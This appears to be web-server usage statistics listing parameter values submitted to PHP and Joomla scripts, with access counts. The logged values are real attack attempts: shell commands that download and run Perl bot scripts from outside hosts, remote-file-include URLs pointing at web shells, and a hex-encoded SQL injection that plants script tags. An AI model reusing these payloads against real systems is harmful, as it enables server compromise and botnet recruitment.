cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt |
17 |
cd /tmp;wget http://h1.ripway.com/tsk4/botx2.txt;perl botx2.
txt;rm -rf *txt* |
15 |
cd /tmp;lwp-download http://h1.ripway.com/cmdtsk/botx2.txt;p
erl botx2.txt;rm -rf *txt* |
14 |
| uname -a; id |
12 |
cd /tmp;killall perl -9;rm -rf *.txt;GET http://lolzao.pop3.
ru/scanz.txt > scanz.txt;perl scanz.txt;rm scanz.txt |
11 |
cd /tmp;lwp-download http://www.019online.com/components/com
_rwcards/images/IND2.jpg;curl -O http://www.019online.com/co
mponents/com_rwcards/images/IND2.jpg;wget http://www.019onli
ne.com/components/com_rwcards/images/IND2.jpg;perl IND2.jpg;
rm -rf *IND* |
11 |
cd /tmp;lwp-download http://h1.ripway.com/tsk7/botx2.txt;per
l botx2.txt;rm -rf *txt* |
9 |
cd /tmp;wget http://h1.ripway.com/cmdtsk/botx2.txt;perl botx
2.txt;rm -rf *txt* |
8 |
cd /tmp;curl -O http://h1.ripway.com/tsk7/botx2.txt;perl bot
x2.txt;rm -rf *txt* |
8 |
| Parameter |
list
|
| Value | Accesses |
| 1 |
19 |
| OTHER: |
2,823 |
| Script | Total Accesses |
|
/wusage/summary/cgi.html//index.php
|
3,235
|
| Parameters by Submitted Value |
| Parameter |
GLOBALS
|
| Value | Accesses |
|
36 |
| http://tanbebek.com/pitik/ascid.txt??? |
1 |
| Parameter |
Itemid50
|
| Value | Accesses |
|
3 |
| Parameter |
Itemid
|
| Value | Accesses |
|
350 |
| 26 |
4 |
| 1 |
2 |
| 156 |
2 |
| 191//administrator/configuration.php?option=com_login |
2 |
| 87//index.php?option=com_joomlaxplorer |
1 |
| 87 |
1 |
| 149 |
1 |
| Parameter |
_REQUEST
|
| Value | Accesses |
|
37 |
| Parameter |
_REQUEST[Itemid
|
| Value | Accesses |
| 1 |
2 |
| Parameter |
_REQUEST[Itemid]
|
| Value | Accesses |
| 1 |
35 |
| Parameter |
_REQUEST[option]
|
| Value | Accesses |
| com_content |
19 |
| com_phpshop |
7 |
| com_rsgallery |
4 |
| com_login |
3 |
| com_facileforms |
2 |
| http://sujianto.com/zreg.txt? |
1 |
| com_performs |
1 |
| com_extcalendar |
1 |
| Parameter |
action
|
| Value | Accesses |
| show_error |
11 |
| Parameter |
admin_path
|
| Value | Accesses |
| http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? |
3 |
| Parameter |
autoLoadConfig[999][0][autoType]
|
| Value | Accesses |
| include |
43 |
| http://normanzito.iespana.es/http.txt?? |
6 |
| http://cornuletz.angelfire.com/c99in.txt? |
5 |
| http://www.corsemusique.com/portail/agenda/muie.txt? |
3 |
http://www.corsemusique.com/portail/agenda/config/tester.txt
? |
3 |
| http://freewebs.com/diegoxfelix/ch.txt? |
2 |
http://mykonos.bargaingreece.com//components/com_log/sefe.tx
t? |
2 |
| http://pc2you.ro/classes/phpmailer/config/tester.txt? |
1 |
| http://usuarios.arnet.com.ar/adrikrasnow/speed.txt? |
1 |
| http://www.perphilrh.com.br/perphilrh/muie.txt? |
1 |
| OTHER: |
2,639 |
| Script | Total Accesses |
|
/wusage/summary/cgi.html/index.php
|
3,170
|
| Parameters by Submitted Value |
| Parameter |
|
| Value | Accesses |
connection:absolute_path=http://invisionar.hostinggratisarge
ntina.com/eth0? |
15 |
connection:absolute_path=http://www.santiagoonline.com.ar/ht
tp? |
9 |
connection:absolute_path=http://www.santiagoonline.com.ar/re
adme.txt? |
6 |
connection:absolute_path=http://usuarios.arnet.com.ar/adrikr
asnow/test.txt? |
4 |
connection:absolute_path=http://tckct.co.uk/public_htm/speed
.txt? |
3 |
connection:absolute_path=http://www.santiagoonline.com.ar/re
adme.txt?http://www.santiagoonline.com.ar/readme.txt? |
3 |
connection:absolute_path=http://arsenicotrolo.webcindario.co
m/eth0? |
2 |
connection:absolute_path=http://usuarios.arnet.com.ar/larry1
23/safe.txt? |
2 |
| connection:absolute_path=http://geragay.bravehost.com/http? |
2 |
| http://aguasanas.com/dysloke/bot.txt? |
2 |
| Parameter |
GLOBALS
|
| Value | Accesses |
|
140 |
| Parameter |
HomeDir
|
| Value | Accesses |
| http://darkisx.com/plugins/xoops/2fast.txt? |
1 |
| Parameter |
Itemid
|
| Value | Accesses |
|
253 |
| 1 |
17 |
| 156 |
4 |
| http://luminaldemon.altervista.org/img/cmd.txt??????????? |
1 |
| Parameter |
RP_PATH
|
| Value | Accesses |
| http://www.wisdomofgod.org/backup/m2f/.r/vampire.txt??? |
1 |
| http://www.wisdomofgod.org/backup/m2f/.r/vampire.txt? |
1 |
| http://www.mascht.com/picart/mh.txt?? |
1 |
| http://www.spindl-hotelpraha.cz/system/temp/control.txt? |
1 |
| http://c0cac0larul3z.t35.com/cmd.txt? |
1 |
| http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? |
1 |
| Parameter |
_REQUEST
|
| Value | Accesses |
|
147 |
| http://usuarios.arnet.com.ar/adrikrasnow/speed.txt? |
20 |
| http://normanzito.iespana.es/http.txt?? |
18 |
| http://usuarios.arnet.com.ar/adipasqua/http? |
15 |
| http://usuarios.arnet.com.ar/larry123/ka.txt? |
15 |
| http://usuarios.arnet.com.ar/larry123/exploit.txt? |
14 |
| http://usuarios.arnet.com.ar/larry123/http? |
13 |
| http://dark4ngel.hostinggratisargentina.com/http? |
12 |
| http://www.iff.coop/.../bre.txt? |
9 |
| http://fxmsn.org/1.txt? |
9 |
| Parameter |
_REQUEST[Itemid
|
| Value | Accesses |
| 1 |
4 |
| Parameter |
_REQUEST[Itemid]
|
| Value | Accesses |
| 1 |
136 |
| http://www.colorglo.it/oneadmin/calendar/.r/stringa.txt? |
1 |
| Parameter |
_REQUEST[option]
|
| Value | Accesses |
| com_content |
70 |
| com_phpshop |
32 |
| com_login |
9 |
| com_akobook |
7 |
| com_rsgallery |
5 |
| option,com_extcalendar |
4 |
| com_sitemap |
3 |
| com_com_akobook |
3 |
| com_facileforms |
2 |
| com_phshop |
2 |
| Parameter |
absolute_path
|
| Value | Accesses |
| http://www.skd.it/vwar/admin/can? |
1 |
| OTHER: |
2,149 |
| Script | Total Accesses |
|
/wusage/summary/cgi.html/newspublish/include.php
|
3,026
|
| Parameters by Submitted Value |
| Parameter |
cmd
|
| Value | Accesses |
| uname -a; id |
16 |
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt |
10 |
| id |
6 |
cd /tmp;rm sta.txt;wget http://189.24.20.53/sta.txt;fetch ht
tp://189.24.20.53/sta.txt;lwp-download http://189.24.20.53/s
ta.txt;curl -O http://189.24.20.53/sta.txt;lynx http://189.2
4.20.53/sta.txt;perl sta.txt;rm sta.txt |
6 |
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml
k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down
load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http://
pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e
s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt? |
6 |
cd /tmp;rm ng*;wget http://ownz-you.com/ng.txt;fetch http://
ownz-you.com/ng.txt;lwp-download http://ownz-you.com/ng.txt;
curl -O http://ownz-you.com/ng.txt;lynx http://ownz-you.com/
ng.txt;perl ng.txt;rm -rf ng* |
6 |
cd /tmp;rm -rf *;cd /tmp;lwp-download http://www1.freewebs.c
om/sur00tec/srz.txt;fetch http://www1.freewebs.com/sur00tec/
srz.txt;curl -o http://www1.freewebs.com/sur00tec/srz.txt;wg
et http://www1.freewebs.com/sur00tec/srz.txt;perl srz.txt;rm
srz.txt |
5 |
cd /var/tmp;rm botnet.txt;wget http://www.powerbikes.gr/foru
m/botnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt
;lwp-download http://www.powerbikes.gr/forum/botnet.txt;curl
-O http://www.powerbikes.gr/forum/botnet.txt;lynx http://ww
w.powerbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.t
xt |
5 |
cd /tmp;rm sta.txt;wget http://189.24.36.96:9090/sta.txt;fet
ch http://189.24.36.96:9090/sta.txt;lwp-download http://189.
24.36.96:9090/sta.txt;curl -O http://189.24.36.96:9090/sta.t
xt;lynx http://189.24.36.96:9090/sta.txt;perl sta.txt;rm sta
.txt? |
4 |
cd /tmp;rm srz.txt;wget http://www.freewebs.com/bl4bl4bl4bl4
/srz.txt;fetch http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;
lwp-download http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;cu
rl -O http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;lynx http
://www.freewebs.com/bl4bl4bl4bl4/srz.txt;perl srz.txt;rm -rf
srz.txt* |
4 |
| Parameter |
list
|
| Value | Accesses |
| 1 |
13 |
| Parameter |
path[docroot]
|
| Value | Accesses |
| http://ownsirc.googlepages.com/botnet.txt? |
61 |
| http://www.freewebs.com/sur00tseclan/httd.txt? |
43 |
| http://invisionar.hostinggratisargentina.com/eth0? |
43 |
| http://216.83.134.89/teste2bot.txt? |
41 |
| http://oon.web.id/r57? |
39 |
| http://www.oslutadores.com/?id=23530 |
36 |
| http://www.freewebs.com/yahwek/sete.txt? |
32 |
| http://usuarios.arnet.com.ar/adrikrasnow/speed.txt? |
31 |
| http://usuarios.arnet.com.ar/larry123/ka.txt? |
28 |
|
28 |
| Parameter |
path[docrs-for-live-51-de.html/skins/advanced/advanced1.php?
pluginpath[0]
|
| Value | Accesses |
| http://www.stdr.xpg.com.br/compito? |
1 |
| Parameter |
xroot
|
| Value | Accesses |
| www.popcorn.de/cmd? |
1 |
| OTHER: |
2,561 |
| Script | Total Accesses |
/wusage/summary/cgi.html//modules/xgallery/upgrade_album.php
|
2,999
|
| Parameters by Submitted Value |
| Parameter |
GALLERY_BASEDIR
|
| Value | Accesses |
|
50 |
| http://invisionar.hostinggratisargentina.com/eth0? |
41 |
| http://mensagenss.hospedagemdesite.com/tool25/tool25.dat? |
39 |
| http://joaobenner.googlepages.com/script2.txt?? |
33 |
| http://ownsirc.googlepages.com/botnet.txt? |
27 |
| http://www.lordxpl.xpg.com.br/own.txt?? |
26 |
| http://yahwek.dll.googlepages.com/phpbot.txt? |
23 |
| http://yugifire.t35.com/tool25.txt? |
21 |
| http://normanzito.iespana.es/http.txt?? |
21 |
| http://www.stdr.xpg.com.br/priv8? |
20 |
| Parameter |
GALLERY_BASEDIRhttp://softhack.bravehost.com/themain.txt?
|
| Value | Accesses |
|
1 |
| Parameter |
cmd
|
| Value | Accesses |
|
2 |
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt* |
25 |
cd /tmp;rm bot1.txt;wget http://yugifire.t35.com/bot1.txt;fe
tch http://yugifire.t35.com/bot1.txt;lwp-download http://yug
ifire.t35.com/bot1.txt;curl -O http://yugifire.t35.com/bot1.
txt;lynx http://yugifire.t35.com/bot1.txt;perl bot1.txt |
23 |
| uname -a; id |
10 |
cd /tmp; wget http://intranet.2circolovimercate.it/intro//mo
dules/Forums/admin/scan.pl; curl -o scan.pl http://intranet.
2circolovimercate.it/intro//modules/Forums/admin/scan.pl; pe
rl scan.pl |
10 |
cd /tmp;wget http://deltaboogie.com/blog/modules/Forums/admi
n/kk.txt;perl kk.txt h4h4 |
9 |
| id |
9 |
cd /tmp;rm -rf ownz*;wget http://enigmax1.kit.net/ownz.txt;l
wp-download http://enigmax1.kit.net/ownz.txt;fetch http://en
igmax1.kit.net/ownz.txt;curl -o ownz.txt http://enigmax1.kit
.net/ownz.txt;GET http://enigmax1.kit.net/ownz.txt >ownz.txt
;lynx -source http://enigmax1.kit.net/ownz.txt >ownz.txt;per
l ownz.txt;rm -rf ownz.txt* |
9 |
cd /tmp;rm -rf bot.txt*;wget http://haddem.awardspace.com/bo
t.txt.txt;lwp-download http://haddem.awardspace.com/bot.txt;
fetch http://haddem.awardspace.com/bot.txt;curl -o bot.txt h
ttp://haddem.awardspace.com/bot.txt;GET http://haddem.awards
pace.com/bot.txt >bot.txt;lynx -source http://haddem.awardsp
ace.com/bot.txt >bot.txt;perl bot.txt;rm -rf bot.txt* |
8 |
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt |
5 |
| Parameter |
list
|
| Value | Accesses |
| 1 |
4 |
| Parameter |
vid
|
| Value | Accesses |
| 41025634 |
1 |
| OTHER: |
2,582 |
| Script | Total Accesses |
|
/wusage/summary/cgi.html/modules/xfsection/modify.php
|
2,972
|
| Parameters by Submitted Value |
| Parameter |
*
|
| Value | Accesses |
| http://www.superlab.jazztel.es/safe.gif? |
8 |
| http://77.90.4.28/safeon.txt?? |
1 |
| Parameter |
cmd
|
| Value | Accesses |
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt |
15 |
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt |
14 |
cd /tmp;killall perl -9;rm -rf *.txt;GET http://lolzao.pop3.
ru/scanz.txt > scanz.txt;perl scanz.txt;rm scanz.txt |
14 |
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt* |
12 |
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml
k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down
load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http://
pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e
s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt? |
10 |
cd /tmp;killall -9 perl;wget http://72.1.85.234/1.txt;curl -
O http://72.1.85.234/1.txt;fetch http://72.1.85.234/1.txt;lw
p-download http://72.1.85.234/1.txt;wget http://72.1.85.234/
2.txt;curl -O http://72.1.85.234/2.txt;fetch http://72.1.85.
234/2.txt;lwp-download http://72.1.85.234/2.txt;wget http://
72.1.85.234/3.txt;curl -O http://72.1.85.234/3.txt;fetch htt
p://72.1.85.234/3.txt;lwp-download http://72.1.85.234/3.txt;
wget http://72.1.85.234/4.txt;curl -O http://72.1.85.234/4.t
xt;fetch http://72.1.85.234/4.txt;lwp-download http://72.1.8
5.234/4.txt;wget http://72.1.85.234/5.txt;curl -O http://72.
1.85.234/5.txt;fetch http://72.1.85.234/5.txt;lwp-download h
ttp://72.1.85.234/5.txt;wget http://72.1.85.234/6.txt;curl -
O http://72.1.85.234/6.txt;fetch http://72.1.85.234/6.txt;lw
p-download http://72.1.85.234/6.txt;perl 1.txt;perl 2.txt;pe
rl 3.txt;perl 4.txt;perl 5.txt;perl 6.txt;rm -rf *txt* |
9 |
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f
etch http://189.24.221.165:9090/sta.txt;lwp-download http://
189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90
90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta.
txt;rm sta.txt |
9 |
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch
http://71.41.190.203/sur0.txt;lwp-download http://71.41.190
.203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt
p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt* |
9 |
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt
p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148
.32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe
tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf
anaozao.txt |
8 |
cd /tmp;rm -rf tut*;wget http://inimigo.t35.com/tut.txt;lwp-
download http://inimigo.t35.com/tut.txt;fetch http://inimigo
.t35.com/tut.txt;curl -o tut.txt http://inimigo.t35.com/tut.
txt;GET http://inimigo.t35.com/tut.txt >tut.txt;lynx -source
http://inimigo.t35.com/tut.txt >tut.txt;perl tut.txt;rm -rf
tut.txt* |
6 |
| Parameter |
dir_moduel
|
| Value | Accesses |
| http://geocities.com/kiddiesSscript/injex.txt? |
1 |
| Parameter |
dir_module
|
| Value | Accesses |
| http://jackzard.110mb.com/r57? |
101 |
| http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat? |
57 |
| http://ownsirc.googlepages.com/botnet.txt? |
48 |
| http://www.oslutadores.com/?id=23530 |
34 |
| http://usuarios.arnet.com.ar/adrikrasnow/speed.txt? |
32 |
| http://www.freewebs.com/yahwek/sete.txt? |
30 |
| http://www.freewebs.com/yahwek/phpbot.txt? |
29 |
| http://invisionar.hostinggratisargentina.com/eth0? |
28 |
| http://www.jungo8949.co.kr/tool25.txt? |
27 |
| http://mensagenss.hospedagemdesite.com/tool25/tool25.dat? |
24 |
| Parameter |
dir_modulehttp://www.geocities.com/greencoolest/Eny.txt?
|
| Value | Accesses |
|
1 |
| Parameter |
list
|
| Value | Accesses |
| 1 |
18 |
| OTHER: |
2,427 |
| Script | Total Accesses |
/wusage/summary/cgi.html//components/com_rsgallery/rsgallery
.html.php
|
2,871
|
| Parameters by Submitted Value |
| Parameter |
|
| Value | Accesses |
| http://badmus.by.ru/id.txt? |
1 |
| Parameter |
?v
|
| Value | Accesses |
|
1 |
| Parameter |
cmd
|
| Value | Accesses |
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt* |
13 |
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml
k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down
load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http://
pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e
s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt? |
12 |
| uname -a; id |
11 |
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt |
11 |
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc
h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br
/~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l
ynx http://eep.br/~gpereira/but.txt;perl but.txt |
11 |
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt
p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148
.32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe
tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf
anaozao.txt |
8 |
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt
;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/
/azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b
otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet
.txt |
7 |
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h
ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4
0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1
89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt |
7 |
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t
xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht
tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no-
ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p
erl botnet.txt |
6 |
cd /tmp;killall perl -9;rm -rf *.txt;GET http://murilok.pop3
.ru/RFI3.txt > RFI3.txt;perl RFI3.txt;rm RFI3.txt |
6 |
| Parameter |
http://www.endro.de/stammbaum/media/thumbs/TumbsInfo.txt?
|
| Value | Accesses |
|
1 |
| Parameter |
list
|
| Value | Accesses |
| 1 |
1 |
| Parameter |
mosC4CMS.php?dir[inc]
|
| Value | Accesses |
| http://www.ss3s.org/r57.txt? |
1 |
| Parameter |
mosConfig_absolute_path
|
| Value | Accesses |
| http://www.jungo8949.co.kr/tool25.txt? |
53 |
| http://www.jolieloves.com/mori/cmd.txt? |
47 |
| http://189.23.251.131/~tiago/new.txt? |
43 |
| http://invisionar.hostinggratisargentina.com/eth0? |
37 |
| http://www.freewebs.com/yahwek/phpbot.txt? |
33 |
| http://usuarios.arnet.com.ar/larry123/safe.txt? |
32 |
| http://www.neoncomanda.kit.net/tool25.dat? |
30 |
| http://ownsirc.googlepages.com/botnet.txt? |
29 |
| http://www.oslutadores.com/?id=23530 |
28 |
|
24 |
| Parameter |
mosConfig_absolute_pathhttp://usuarios.arnet.com.ar/adrikras
now/rfi/bla.txt?
|
| Value | Accesses |
|
2 |
| OTHER: |
2,416 |
| Script | Total Accesses |
|
/
|
2,567
|
| Parameters by Submitted Value |
| Parameter |
/Packages.php?sourcedir
|
| Value | Accesses |
| http://h1.ripway.com/slavezero/slavesukses.txt?? |
1 |
| Parameter |
/zero_vote/error.php?dir
|
| Value | Accesses |
| http://jentshin.new21.org/zboard_eng//data/cmd/inc??? |
1 |
| Parameter |
|
| Value | Accesses |
|
9 |
| Parameter |
';DECLARE @S CHAR(4000);SET @S
|
| Value | Accesses |
CAST(0x4445434C415245204054207661726368617228323535292C40432
076617263686172283430303029204445434C415245205461626C655F437
572736F7220435552534F5220464F522073656C65637420612E6E616D652
C622E6E616D652066726F6D207379736F626A6563747320612C737973636
F6C756D6E73206220776865726520612E69643D622E696420616E6420612
E78747970653D27752720616E642028622E78747970653D3939206F72206
22E78747970653D3335206F7220622E78747970653D323331206F7220622
E78747970653D31363729204F50454E205461626C655F437572736F72204
645544348204E4558542046524F4D20205461626C655F437572736F72204
94E544F2040542C4043205748494C4528404046455443485F53544154555
33D302920424547494E20657865632827757064617465205B272B40542B2
75D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736
372697074207372633D22687474703A2F2F777777302E646F7568756E716
E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D2
7272B5B272B40432B275D20776865726520272B40432B27206E6F74206C6
96B6520272725223E3C2F7469746C653E3C736372697074207372633D226
87474703A2F2F777777302E646F756 |
1 |
| Parameter |
;DECLARE @S CHAR(4000);SET @S
|
| Value | Accesses |
CAST(0x4445434C415245204054207661726368617228323535292C40432
076617263686172283430303029204445434C415245205461626C655F437
572736F7220435552534F5220464F522073656C65637420612E6E616D652
C622E6E616D652066726F6D207379736F626A6563747320612C737973636
F6C756D6E73206220776865726520612E69643D622E696420616E6420612
E78747970653D27752720616E642028622E78747970653D3939206F72206
22E78747970653D3335206F7220622E78747970653D323331206F7220622
E78747970653D31363729204F50454E205461626C655F437572736F72204
645544348204E4558542046524F4D20205461626C655F437572736F72204
94E544F2040542C4043205748494C4528404046455443485F53544154555
33D302920424547494E20657865632827757064617465205B272B40542B2
75D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736
372697074207372633D22687474703A2F2F777777302E646F7568756E716
E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D2
7272B5B272B40432B275D20776865726520272B40432B27206E6F74206C6
96B6520272725223E3C2F7469746C653E3C736372697074207372633D226
87474703A2F2F777777302E646F7568 |
1 |
| Parameter |
??????mosConfig_absolute_path
|
| Value | Accesses |
| http://www.larisco.com/id.txt?? |
6 |
| http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt? ?? |
1 |
| Parameter |
CONFIG_EXT[ADMIN_PATH]
|
| Value | Accesses |
| http://russianinterpreter.ru/images/stories/idd.txt?? |
3 |
| http://www.turnipsoup.com/1/id.txt? |
2 |
| Parameter |
CONFIG_EXT[LANGUAGES_DIR]
|
| Value | Accesses |
| http://www.geocities.com/guest1380/load.txt?? |
4 |
| http://suwung.890m.com/test.txt??? |
4 |
| http://borneo.siteburg.com/chid.txt?? |
3 |
| http://ebooks.siteburg.com/chid.txt?? |
2 |
| http://hist.hongik.ac.kr/zb4pl6/data/teszos? |
2 |
| http://chucksden.com/echo.txt? |
2 |
| http://www.readingastro.org.uk//wap/in/id.txt?? |
2 |
http://www.klammehand.be/forum/language/lang_polish/idmic2.t
xt? |
2 |
| http://www.geocities.com/gary.dalnet/dalnet/load.txt?? |
1 |
| http://www.geocities.com/kopet8288/load.txt?? |
1 |
| Parameter |
DOCUMENT_ROOT
|
| Value | Accesses |
| http://www.gter.biz/bot.txt?? |
1 |
| http://kingkool2.free.fr/ezupload/ips.txt? |
1 |
| Parameter |
GALLERY_BASEDIR
|
| Value | Accesses |
| http://www.netpressz.hu/wap/cmd.txt?? |
3 |
| http://prestodoor.com/public_html/alb_id.txt? |
1 |
| http://8o0o8.info/id/id/id.txt???? |
1 |
| http://danieledm.altervista.org/PhP/id_dany.txt?? |
1 |
| http://www.covoiturage.fr/CALC/id2.txt??? |
1 |
| http://mail.tu-varna.bg/test.txt??? |
1 |
http://www.belgraver-warffemius.nl/genealogy/lazarusgb/publi
c/job.txt?? |
1 |
| OTHER: |
2,508 |
| Script | Total Accesses |
/wusage/summary/cgi.html/modules/tinycontent/admin/spaw/spaw
_control.class.php
|
2,537
|
| Parameters by Submitted Value |
| Parameter |
|
| Value | Accesses |
|
1 |
| Parameter |
cmd
|
| Value | Accesses |
| uname -a; id |
16 |
cd /tmp;lwp-download http://h1.ripway.com/tsk4/botx2.txt;per
l botx2.txt;rm -rf *txt* |
14 |
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt |
13 |
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt |
11 |
cd /tmp;wget http://h1.ripway.com/tsk4/botx2.txt;perl botx2.
txt;rm -rf *txt* |
7 |
| id |
7 |
cd /tmp;rm ng*;wget http://ownz-you.com/ng.txt;fetch http://
ownz-you.com/ng.txt;lwp-download http://ownz-you.com/ng.txt;
curl -O http://ownz-you.com/ng.txt;lynx http://ownz-you.com/
ng.txt;perl ng.txt;rm -rf ng* |
6 |
cd /tmp;rm x.txt;wget http://189.6.162.125:8090/x.txt;fetch
http://189.6.162.125:8090/x.txt;lwp-download http://189.6.16
2.125:8090/x.txt;curl -O http://189.6.162.125:8090/x.txt;lyn
x http://189.6.162.125:8090/x.txt;perl x.txt |
6 |
cd /var/tmp;rm botnet.txt;wget http://www.powerbikes.gr/foru
m/botnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt
;lwp-download http://www.powerbikes.gr/forum/botnet.txt;curl
-O http://www.powerbikes.gr/forum/botnet.txt;lynx http://ww
w.powerbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.t
xt |
5 |
cd /tmp;lwp-download http://www.019online.com/components/com
_rwcards/images/IND2.jpg;curl -O http://www.019online.com/co
mponents/com_rwcards/images/IND2.jpg;wget http://www.019onli
ne.com/components/com_rwcards/images/IND2.jpg;perl IND2.jpg;
rm -rf *IND* |
5 |
| Parameter |
list
|
| Value | Accesses |
| 1 |
13 |
| Parameter |
s
|
| Value | Accesses |
| r |
1 |
| Parameter |
spaw_root
|
| Value | Accesses |
| http://jorgevolio.com/.cookies/safe.gif? |
100 |
| http://ownsirc.googlepages.com/botnet.txt? |
34 |
| http://h1.ripway.com/tsk4/cmd.txt? |
31 |
| http://invisionar.hostinggratisargentina.com/eth0? |
27 |
| http://usuarios.arnet.com.ar/adrikrasnow/speed.txt? |
26 |
| http://www.freewebs.com/yahwek/sete.txt? |
26 |
| http://www.oslutadores.com/?id=23530 |
25 |
